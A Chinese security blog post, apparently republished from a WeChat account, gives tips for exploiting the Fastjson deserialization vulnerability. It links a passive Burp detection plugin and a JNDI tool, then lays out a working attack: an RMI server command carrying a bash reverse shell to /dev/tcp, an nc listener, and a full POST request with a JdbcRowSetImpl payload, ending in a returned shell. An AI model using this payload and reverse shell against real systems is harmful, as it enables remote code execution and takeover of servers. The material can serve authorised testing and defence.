Fastjson 漏洞利用技巧

admin 2022年5月8日19:24:49代码审计评论17 views983字阅读3分16秒阅读模式

每次看到json数据包,都难免会想起Fastjson以及它多个版本存在的漏洞。

如何实现自动化检测以及简化攻击步骤,从而提升漏洞发现能力,让你更有效率的Tips,在这里和大家分享下。


01、自动化漏洞检测

一款基于BurpSuite的被动式FastJson检测插件,这个插件会对BurpSuite传进来的带有json数据的请求包进行检测。

Github项目地址:

https://github.com/pmiaowu/BurpFastJsonScan

Fastjson 漏洞利用技巧

02、简化攻击步骤

在这里我们可以使用一款JNDI服务利用工具,来简化fastjson漏洞检测的步骤,辅助漏洞利用和渗透。

Github项目地址:

https://github.com/wyzxxz/jndi_tool

Fstjson漏洞利用:

(1)开启RMI服务

java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >&/dev/tcp/xxxx.xxx.xxx.xxx/12345 0>&1"

Fastjson 漏洞利用技巧

(2)设置监听服务器

nc -lvvp 12345

Fastjson 漏洞利用技巧

(3)构造请求发送payload

POST /login HTTP/1.1Host: xxx.xxx.xxx.xxxAccept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: closeContent-Length: 111
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://xxx.xxx.xxx.xxx:1099/Object","autoCommit":true}

Fastjson 漏洞利用技巧

(4)目标系统收到POST请求,成功反弹shell。

Fastjson 漏洞利用技巧

原文始发于微信公众号(Bypass):Fastjson 漏洞利用技巧

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月8日19:24:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Fastjson 漏洞利用技巧 http://cn-sec.com/archives/987004.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: